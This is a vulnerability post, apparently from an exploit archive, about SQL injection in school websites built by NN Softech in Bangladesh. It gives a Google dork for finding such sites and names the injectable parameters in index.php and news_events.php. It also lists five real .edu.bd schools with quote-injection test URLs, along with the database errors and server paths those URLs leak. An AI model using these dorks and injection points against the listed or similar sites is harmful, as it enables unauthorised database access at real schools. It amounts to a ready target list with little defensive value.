facebook facebook twitter rss

Powered by NN Softech Web Design Bangladesh SQL Injection Vulnerability

Author: KingSkrupellos , Published: 09-10-2018
# Exploit Title : Powered by NN Softech Web Design Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Owner of the Script : bd.linkedin.com/in/sheikh-shaheen-30b40011a
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018090020

#################################################################################################

# Google Dork : intext:''Powered by : NN SOFTECH''

# Exploit :

/index.php?page=[SQL Injection]

/news_events.php?page=[ID-NUMBER]&did=SQL Injection]

#################################################################################################

# Example Site =>

1) cbsfmhs.edu.bd/news_events.php?page=1&did=52%27 => [ Proof of Concept ] => archive.is/eCGLQ

2) mgsc.edu.bd/index.php?page=43%27 => [ Proof of Concept ] => archive.is/61kCD

3) akpsc.edu.bd/news_events.php?page=1&did=52%27

4) ngghschool.edu.bd/news_events.php?page=1&did=50%27

5) ssidm.edu.bd/news_events.php?page=1&did=56%27

# Example SQL Database Error =>

Warning: mysql_fetch_assoc(): supplied argument is not a valid
MySQL result resource in /home/cbsm3x2s/public_html/news_events.php on line 131

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in
/home/ngghscho61y0/public_html/news_events.php on line 131

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in
/home/ngghscho61y0/public_html/news_events.php on line 145

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :